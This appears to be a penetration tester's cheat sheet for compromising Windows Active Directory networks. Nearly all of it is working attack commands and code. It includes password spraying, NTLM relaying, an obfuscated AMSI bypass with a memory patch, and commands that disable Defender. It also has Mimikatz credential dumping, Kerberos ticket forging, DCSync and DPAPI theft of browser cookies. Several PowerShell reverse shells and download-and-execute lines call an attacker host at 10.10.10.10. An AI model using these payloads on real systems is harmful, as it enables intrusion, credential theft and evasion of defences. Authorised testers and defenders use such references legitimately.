# nmap -sn 10.10.10.0/24 -oN hosts.txt
or
Nessus host discovery
or
Fping
# fping 10.10.10.10
Network scan that sends one ping packet per IP
# fping -a -r 0 -g 10.10.10.0/24
4 ping packets per IP (-r for retry)
# fping -a -r 3 -g 10.10.10.0/24
Faster network scan by by adding "-i 1" switch (Requires sudo, waits 1ms between pings)
# sudo fping -a -i 1 -r 0 -g 10.10.10.0/24
Fast scan, but from a host-list
# sudo fping -a -i 1 -r 0 < iplist.txt
# nmap --open -p 445 -iL iplist.txt -oN smb_ipsonly.txt
Nmap sometimes does not resolve DNS names so two commands should be used to grab all the IPs.
// greps the IPs with resolved DNS names
# cat ips-2_opensmb.txt| grep "report for" | cut -d " " -f 6 | grep -v -e '^$' | tr -d '()' > ips-2_ipsonly.txt
// greps the IPs without resolved DNS names, removes whitespaces and greps numbers ONLY.
# cat smbopen_ips-1 | grep "report for" | cut -d " " -f 5 | grep [0-9] | grep -v [a-z] > smbips_only.txt
- Create custom list of passwords like months, season, company name.
Using bash to add year and symbols, in this case "!"
# for i in $(cat wordlist.txt); do echo $i; echo ${i}2020; echo ${i}2020\!; done
or use hashcat's rule to mutate the passwords (optional).
- Do OSINT against the target company. LinkedIn and Google is a good place to start.
- Harvest email addresses and create different naming conventions.
- Tools: MailSniper.ps1 (https://github.com/dafthack/MailSniper), Metasploit, https://github.com/byt3bl33d3r/SprayingToolkit
Internal or External domain enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-DomainHarvestOWA -ExchHostname mail.domain.com -OutFile possibledomains.txt -CompanyName "Company A"
Username enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-UsernameHarvestOWA -UserList .\userlist.txt -ExchHostname mail.domain.com -Domain domain.txt -OutFile possibleusernames.txt
With metasploit (timing attack):
msf5 > use auxiliary/scanner/http/owa_login >
Password spraying (doable with metasploit's owa_login as well):
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
EWS:
PS C:\Tools> Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
- Assuming we got valid credentials
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Pa$$w0rd -OutFile .\GAL.txt
https://github.com/dafthack/MSOLSpray
- Tools: RDPassSpray.py (https://github.com/xFreed0m/RDPassSpray)
# python3 RDPassSpray.py -u chunk -p nocaptainchunk! -d EASY-CORE -t 10.10.10.10:<port>
# python3 RDPassSpray.py -U users.txt -P passwords.txt -d EASY-CORE -t 10.10.10.10:<port>
- Read /etc/resolv.conf from kali
- Run nmap on port 445 and 53
or from a domain joined machine:
# Get your ad domain
$DomainName = (Get-ADDomain).DNSRoot
# Get all DC's
$AllDCs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem
# Or
$AllDCs = (Get-ADForest).GlobalCatalogs
- https://github.com/lgandx/Responder
- add -wrt for wpad, but don't run this for very long
- f relaying, turn off http and smb in Responder.conf
- logs: /usr/share/responder/logs
# responder -I eth0
- https://github.com/fox-it/mitm6
- I usually run nmap to discover hosts with smbsigning disabled or not required
# nmap -p137,139,445 --script smb-security-mode
or using CrackMapExec:
#crackmapexec smb 10.10.10.0/24 --gen-relay-list ipstoberelayed.txt
# python mitm6.py -l domain.local -v
# ntlmrelayx.py -6 -tf ipstoberelayed.txt
https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
PS C:\tools> Out-CHM -PayloadURL http://10.10.10.10/nishang.ps1 -HHCPath "C:\tools"
Generating malicious office files with macro: https://github.com/curi0usJack/luckystrike
Good References: https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/ https://npercoco.typepad.com/.a/6a0133f264aa62970b0240a4f06315200d-pi https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5 https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/ https://www.youtube.com/watch?v=WRrzX7cGHaY&feature=youtu.be&ab_channel=ColinHardy
or check my blog about client side attacks: https://msry1.wordpress.com/2020/07/03/having-fun-with-client-side-attacks/
Download: git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec More flags: https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference Password Spray:
# crackmapexec smb 10.10.10.10 -u userlists.txt -p Pa$$w0rd
Pass the hash:
# crackmapexec smb [IP] -u [user] -p [pass]| -H [hash]
Useful CME Flags:
- Domain Password Policy: --pass-pol
- Use local authentication: --local-auth
- Find SMB Shares: --shares
- Find Loot: --spider [Share Name] --depth [how deep, ie. 10] --pattern [ssn|password|credit] --shares | egrep -v "([-]|[+]|[*]|--|ADMIN|print|IPC|Default share|Remark)"
- Extract SAM: --sam
- Get LSA Secrets: --lsa
- Who is currently logged in: --loggedon-users
- Load a Module: -M ie. Mimikatz
- Extract NTDS: --ntds drsuapi
PS:\> query user
- Tools: PowerShdll (https://github.com/p3nt4/PowerShdll)
Checking current language mode:
PS C:\Tools> $ExecutionContext.SessionState.LanguageMode
Only works when CLM is locally setup.
PS C:\Tools> curl http://10.10.10.10/PowerShdll.dll -OutFile ps.dll
PS C:\Tools> rundll32.exe .\ps.dll, main -i
With Local Admin (GUI):
- Edit the system environment variables
- __PSLockDownPolicy set to 8
With Local Admin (CLI):
PS C:\Tools> Remove-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\" -name __PSLockdownPolicy
PS C:\Tools> setx _PSLockdownPolicy 0 /m
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
With ps.dll:
PS C:\Tools> curl http://10.10.10.10/amsibypass.ps1 -OutFile amsibypass.ps1
PS C:\Tools> $amsi = [IO.File]::ReadAllText(".\amsibypass.ps1")
PS C:\Tools> IEX $amsi
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
$command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/nishang.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
Encode file content
[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\path\to\script.ps1')) | clip
Powershell -EncodedCommand $encodedCommand
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
- Tools: PowerView.ps1, PowerView_dev.ps1 (PowerView 3), , PingCastle, ADRecon.ps1
- https://github.com/sense-of-security/ADRecon
- This will generate a nice .csv files we can parse
# rpcclient -U ""%"" 10.10.10.10 -c enumdomusers | cut -d" " -f1 | cut -d":" -f2 | tr -d "[]"
script:
#!/bin/bash
# Make bash array user-rids=()
# Change user, password, and domain
user_rids=( $(rpcclient -U ""%"" 10.163.193.1 -c enumdomusers | cut -d" " -f2 | cut -d":" -f2 | tr -d "[" | tr -d "]") )
# Change user, password, and domain
for i in "${user_rids[@]}"
do
rpcclient -U ""%"" 10.163.193.1 -c "queryuser $i"
done
PS C:\Tools> .\ADRecon.ps1
Enumerating Domain:
PS C:\Tools> Get-NetDomain -Domain domain.local
PS C:\Tools> Get-DomainSID
PS C:\Tools> (Get-DomainPolicy)."system access"
PS C:\Tools> Get-NetDomainController -Domain domain.local
Enumerating Trusts and Forest:
PS C:\Tools> Get-NetDomainTrust -Domain
PS C:\Tools> Get-NetForestCatalog
PS C:\Tools> Get-NetForest
PS C:\Tools> Get-NetForestDomain | Get-NetDomainTrust
Enumerating Users:
PS C:\Tools> Get-NetUser | select -ExpandProperty samaccountname | clip
PS C:\Tools> Get-UserProperty
PS C:\Tools> Find-UserField
Powerview_dev
PS C:\Tools> $Date = (Get-Date).AddYears(-1).ToFileTime()
PS C:\Tools> Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset | clip
Enumerating Group Membership of Users:
PS C:\Tools> Get-NetGroup -UserName admin | select cn | clip
Enumerating Groups:
- Use both PowerView and dev
PS C:\Tools> Get-NetGroup -Domain domain.local
PS C:\Tools> Get-NetGroup -GroupName "Domain Admins"
PS C:\Tools> Get-NetLocalGroup -ComputerName dt-dc -Recurse
PS C:\Tools> Get-NetLocalGroupMember -ComputerName DT-DC1.domain.local -GroupName "administrators"
Enumerating Group Members:
PS C:\Tools> Get-NetGroup -UserName admin
PS C:\Tools> Get-NetGroupMember -GroupName "Domain Admins"
PowerView dev:
PS C:\Tools> Get-NetGroupMember -Identity "Domain Admins" | select MemberName,MemberSID | clip
Enumerating Computers:
PS C:\Tools> Get-NetComputer
PS C:\Tools> Get-NetComputer -Ping
PS C:\Tools> Get-NetComputer -FullData
Enumerating Shares:
PS C:\Tools> Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
PowerView dev:
PS C:\Tools> Find-InterestingDomainShareFile
Enumerating OU:
PS C:\Tools> Get-NetOU
PS C:\Tools> Get-NetOU myOUname | %{Get-NetComputer -ADSPath $_}
PowerView dev:
PS C:\Tools> Get-NetOU | select distinguishedname (do this first)
PS C:\Tools> Get-DomainComputer -SearchBase "OU=Domain Controllers,DC=dt,DC=domain,DC=local" | select name
Enumerating GPO:
PS C:\Tools> Get-NetGPO
PS C:\Tools> Get-NetGPO -CompouterName dt-dc
PS C:\Tools> Get-NetGPO | select flags,cn
PS C:\Tools> Get-NetGPO -GPOname "{xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"
PS C:\Tools> (Get-NetOU testOU -FullData).gplink (Enumerate GPO applied on the testOU OU)
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
- Ctrl F for IdentityReference and ActiveDirectoryRights
PowerView dev:
PS C:\Tools> Get-DomainGPO -ComputerIdentity DT-DC | select displayname,cn
Enumerating hidden GPO:
PS C:\Tools> (([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
Enumerating ACL:
PS C:\Tools> Invoke-ACLScanner | select ObjectDN,ActiveDirectoryRights,IdentityReference
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "admin"}
Enumerating objects with Unconstrained Delegation:
PS C:\Tools> Get-DomainComputer -Unconstrained | select cn
Enumerating objects with Constrained Delegation:
PS C:\Tools> Get-DomainUser -TrustedToAuth | select cn,useraccountcontrol,serviceprincipalname | fl
S C:\Tools> Get-DomainComputer -TrustedToAuth | fl
https://github.com/ropnop/kerbrute
https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
sudo ./kerbrute userenum -d <domain> <userList>
|:. PingCastle (Version 2.8.1.0 2/23/2020 7:08:54 AM)
| #:. Get Active Directory Security at 80% in 20% of the time
# @@ > End of support: 12/31/2021
| @@@:
: .# Vincent LE TOUX ([email protected])
.: twitter: @mysmartlogon https://www.pingcastle.com
What do you want to do?
=======================
Using interactive mode.
Do not forget that there are other command line switches like --help that you can use
1-healthcheck-Score the risk of a domain
2-conso -Aggregate multiple reports into a single one
3-carto -Build a map of all interconnected domains
4-scanner -Perform specific security checks on workstations
5-advanced -Open the advanced menu
0-Exit
==============================
This is the main functionnality of PingCastle. In a matter of minutes, it produces a report which will give you an overview of your Active Directory security. This report can be generated on other domains by using the existing trust links.
Use the latest BloodHound 3 and Neo4j 4.1
PS C:\Tools> . .\SharpHound.ps1
PS C:\Tools> Invoke-BloodHound -CollectionMethod All
Hunting for Local Admin access: Tools: PowerView.ps1, Find-WMILocalAdminAccess.ps1, Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Find-LocalAdminAccess
PS C:\Tools> . .\Find-WMILocalAdminAccess.ps1
PS C:\Tools> Find-WMILocalAdminAccess
PS C:\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> Find-PSRemotingLocalAdminAccess
PowerUp:
PS C:\Tools> . .\PowerUp.ps1
PS C:\Tools> Invoke-AllChecks
If we compromised a service account, check if this account has SeImpersonatePrivilege. If so, we can use JuicyPotato ir RougePotato to escalate to SYSTEM.
Juicy Potato:
PS C:\Tools> .\JuicyPotato.exe -l 7337 -t * -p C:\reports\53.exe -c ‘{8BC3F05E-D86B-11D0-A075-00C04FB68820}'
RougePotato
https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
[dt-dc]: PS C:\Users\admin\Documents> $Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://192.168.50.147/nishang8080.ps1''))'
[dt-dc]: PS C:\Users\admin\Documents> Out-File -Encoding Ascii -InputObject $Contents -FilePath C:\Users\admin\Desktop\reverse.bat
[dt-dc]: PS C:\Users\admin\Documents> Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:92937945B518814341DE3F726500D4FF /run:C:\users\appadmin\desktop\reverse.bat"'
- This includes ways to defeat kerberos double-hop issue
Passing credentials (PSCREDENTIALS):
$password = ConvertTo-SecureString “Pa$$w0rd” -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential (“domain\user”, $password)
vs kerberos double hop in a nested request:
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
hostname
Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}
PSRemoting:
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dt-dc
Creating a session with credentials:
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credentials domain\user
or
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credentials (Get-Credential)
Nested PSRemoting (inside a PSRemoting session):
- Create a pscredential first, or do the Get-Credential technique
- Only works if our user have access to the other remote machine
[dc-computer] PS C:\Tools> $session = New-PSSession -ComputerName dt-computer1 -Credentials domain\user
[dc-computer] PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $session
- If we compromise a machine, we can enumerate its user's access to other machines via PowerView or FindLocalAdminAccess.
- Usually, we don't have the plaintext password of the compromised user so we cannot do the nested psremoting with pscredentials.
- To get away with this, we need to get a reverse shell from the victim machine.
- Check "Reverse Shell from a PSSession" or "One Liner"
- Once we get
PS C:\Tools> $sess = New-PSSession dt-computer1
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $sess
# crackmapexec smb [IP] -u [user] -p [pass]| -H [hash]
# evil-winrm.rb -i 10.10.10.10 -u user -H FB18AD18D520EA42025E3F676D325F23
# mimikatz.exe "sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"
# Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
# psexec.py [email protected] -hashes :FB18AD18D520EA42025E3F676D325F23
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
# socat tcp-l:1515,fork tcp:10.10.10.10:3389
Example: reach port 80 from a server a foothold Windows machine can talk to to your Kali
\\ this will open port 10000 on the foothold machine and forwards all the traffic to connectaddress' port 80
PS C:\Windows\system32> netsh interface portproxy add v4tov4 listenport=10000 connectport=80 connectaddress=10.10.10.10
\\ open port 10000 on the foothold machine
PS C:\Windows\system32> netsh firewall add portopening TCP 1000 "Open Port 10000"
\\ turn off the firewall filtering
PS C:\Windows\system32> netsh advfirewall set allprofiles state off
Browse footholdmachineip:10000
meterpreter > background
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 5
msf6 post(multi/manage/autoroute) > run
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks4
msf6 auxiliary(server/socks4a) > set srvhost 127.0.0.1
msf6 auxiliary(server/socks4a) > exploit -j
Then use proxychains to connect to the system
- This should show allowed directories where we can execute our own binaries
PS C:\Tools> (Get-AppLockerPolicy -Local).RuleCollections
PS C:\Tools> Get-AppLockerPolicy -Local -Effective -Xml | Set-Content ('C:\users\public\applockerpolicy.xml')
If AppLocker were configured with default rules, this directory is whitelisted by default:
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\Tasks
C:\windows\tracing
- Just like bash_history in Linux
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- Kerberos is all about IMPERSONATION
A word about kerberos (credits to a youtube user "twaca")
One way to think of using Kerberos is to think of going to an amusement park. When you arrive at the park, you go to the main gate. You then proceed to the main ticket booth (the authentication server in the key distribution center) and purchase an all-day pass to the park (a ticket-granting ticket). You receive a purple wristband (because purple is the color for Wednesday) that indicates that you have paid your fee for that day and you have full access to the park. The colored wristband is good for all day. While in the park, you must purchase additional tickets for the rides. You walk up to a ticket booth (ticket-granting server) and the attendant notices that you have a purple wristband. You tell her you are wanting to ride the roller coaster. She issues you a ticket (session ticket) for the roller coaster. When you get to the roller coaster, the roller coaster attendant sees your purple wristband and accepts the ticket issued to you by the ticket seller. The roller coaster attendant does not need to check with the ticket seller because that is the only place you could have obtained that ticket. At the end of the day, when the park closes, the purple wristband for Wednesday no longer authenticates you. The wristband color for Thursday is orange. You also noticed that you did all the work. None of the ticket sellers or ride operators communicated with each other. It was up to you to procure tickets and walk around and distribute them. This is exactly the model as designed by MIT for Kerberos.
- If we have access to a computer with Unconstrained Delegation, we can potentially gain access to any user that authenticates to it because it will store their TGT into the memory which can be used for impersonation.
If you have DC machine account's ticket via printer bug, do DCSync
https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976
https://blog.stealthbits.com/unconstrained-delegation-permissions/
Tools: Rubeus, Mimikatz
Dump the tickets (check if there's any user we can impersonate) using Rubeus:
PS C:\Tools> Rubeus.exe dump
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
Injecting the ticket: Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64ticket...
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'
PS C:\Tools> .\mimikatz "privilege::debug" "kerberos::ptt C:\path\to\ticket.kirbi
Monitor for the tickets:
C:\Tools> Rubeus.exe monitor /interval:5 /filteruser:TARGETDC$
Force machine account authentication:
C:\Tools> SpoolSample.exe TARGETDC01 FOOTHOLD01
Then inject the ticket with rubeus ptt.
Run DCSync
mimikatz # lsadump::dcsync /domain:domain.com /user:domain\krbtgt
- If we have access to any object with Constrained Delegation, this object with attribute "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION" can access a specific service. We can request any TGT for any users as long as they're not marked "Sensitive". We can inject the TGT and request more services for abuse.
Tools: Kekeo, Mimikatz, Rubeus
Converting plaintext creds to ntlm:
PS C:\Tools> .\Rubeus.exe hash /password:lab
kekeo # tgt::ask /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /ticket:admin.kirbi
kekeo # tgs::s4u /tgt:TGT
Injecting TGT using mimikatz:
mimikatz # kerberos::ptt TGT.kirbi
Using Rubeus:
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domaian.local /altservice:cifs /ptt
PS C:\Tools> ls \\dt-dc.domaian.local\c$
or request for LDAP for DCSync
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domaian.local /altservice:ldap /ptt
mimikatz # lsadump::dcsync /user:domain\Administrator
DCSync:
mimikatz # lsadump::dcsync /user:domain\Administrator
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 13100 hashes.txt rockyou.txt
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 18200 hashes.txt rockyou.txt
Set pre-auth to on
powershell Set-DomainObject -Identity user1 -XOR@{useraccountcontrol=4194304} -Verbose
- Could be used to move laterally
- Could be used to exploit misconfigured MSSQL servers Tools: PowerUpSQL (https://github.com/NetSPI/PowerUpSQL)
- https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
- https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3 Enumerate the live instances:
PS C:\Tools> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
Enumerate the links:
PS C:\Tools> Get-SQLServerLink -Instance mssql.instance.local
Crawl the links:
PS C:\Tools> Get-SQLServerLinkCrawl -Instance mssql.instance.local
- If we have sysadmin access to the end of the link, we can get a reverse shell using the following:
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell iex(new-object net.webclient).downloadstring(''http://192.168.50.147/nishang8080.ps1'')"'
or
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'
Tools: Mimikatz, ProcDump
- I usually prefer using one liners that dumps all the important hashes I need
PS C:\Tools> Invoke-Mimikatz -Command '"privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets" exit
Against protected LSA (need mimidrv.sys on disk)
.\mimikatz.exe "privilege::debug" "log .\Result.txt" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets" exit
PS C:\Tools> Invoke-Mimikatz -dumpcreds
PS C:\Tools> Invoke-Mimikatz -command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe" exit
- This assumes that we compromised a domain that has a trust and we want to compromise the trusted domain
- Requires the domain trust hash or the krbtgt account hash
Method 1: Using the trust ticket
Extract the trust ticket and grab the hash of the trust domain.local → domain you want to compromise:
mimikatz# lsadump::trust /patch
Using mimikatz golden to impersonate the trust: sid: current domain's SID sids: target domain's SID + 519 rc4: trust ticket from lsadump::trust /patch (domain.local → target.domain.local)
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-519 /rc4:FB18AD18D520EA42025E3F676D325F23 /service:krbtgt /target:target.domain.local /ticket:C:\Tools\kekeo_old\target.kirbi"'
Next, ask tgs using the ticket generated above.
PS C:\Tools\kekeo_old> .\asktgs.exe .\target.kirbi CIFS/dc-dt.target.domain.local
Injecting the ticket:
PS C:\Tools> .\kirbikator.exe lsa .\CIFS/dt-dc.target.domain.local.kirbi
Check access:
PS C:\Tools> dir \\dt-dc.target.domain.local\c$
Method 2: Using krbtgt hash
Extract the krbtgt via dcsync or mimikatz
mimikatz# lsadump::lsa /patch
Same as method 1, using mimikatz golden module:
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-500 /krbtgt:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080
Next, convert the ticket to base64:
PS C:\Tools> [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\tools\ticket.kirbi"))
Pass the ticket using Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64...
Best reference: https://adsecurity.org/?p=2011 This attack needs the machine hash. Example: dt-dc$
Create and inject a silver ticket using mimikatz kerberos::golden. Confirm ticket using klist.
PS C:\Tools> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /target:dt-dc.domain.local /service:HOST /rc4:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
Create a scheduled task that downloads and execute nishang. (the quotes are tricky)
PS C:\Tools> schtasks /create /S dt-dc.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "priv4" /TR "powershell.exe -c 'iex(new-object net.webclient).downloadstring(''http://10.10.10.10/9001.ps1''')'"
Run the scheduled task.
PS C:\Tools> schtasks /Run /S dt-dc.nuclear.site /TN "priv4"
Reverse shells: https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15 Compile with Visual Studio
For c# command line compiling
PS C:\Tools> csc -out:rev.exe Program.cs
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth, 0);
}
https://github.com/OlivierLaflamme/Cheatsheet-God
-k - keep listening -w - reduce timeout
#netcat -nvlp 1234 -k -w 1
# crackmapexec smb -u user -p password -x "powershell BEACON OR GRUNT HERE"
PowerView_dev.ps1
Add-ObjectACL -PrincipalIdentity domain\user -Rights DCSync -Verbose
C:\> $encrypted = Get-Content .\Encrypted.txt
C:\> $d1 = ConvertTo-SecureString $encrypted -Key (iex(Get-Content .\key.txt))
C:\> $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($d1)
C:\> $password = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr)
C:\> $password
SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]
or
lsadump::backupkeys /system:<DOMAIN CONTROLLER> /export
with DA, then
dpapi::chrome /in:“Login Data|Cookies” [/unprotect | /masterkey:SHA1]
or
SharpDPAPI.exe triage /server:HOST /pvk:BASE64
SharpChrome logins /server:HOST /pvk:BASE64
SharpChrome cookies /server:HOST /pvk:BASE64
Finding RDP Regex:
Event ID: 4624
Text in description:
Logon Type:[\t\s]*10[\r\n\s]*|Logon Type:[\t\s]*12[\r\n\s]
python secretsdump.py DOMAIN.COM/adminuser:[email protected] -user-status -pwd-last-set -outputfile DC01
Cracking NTLM or NTDS.dit
hashcat.exe -a 0 -m 1000 hashes.txt wordlist.txt -r rule.rule --username -w 2 -O -o outfile.txt
Display potfile
hashcat.exe -a 0 -m 1000 hashes.txt —show —username
Use https://www.base64encode.org/
Must be encoded with UTF-16LE
powershell.exe -encoded base64utf-16le...
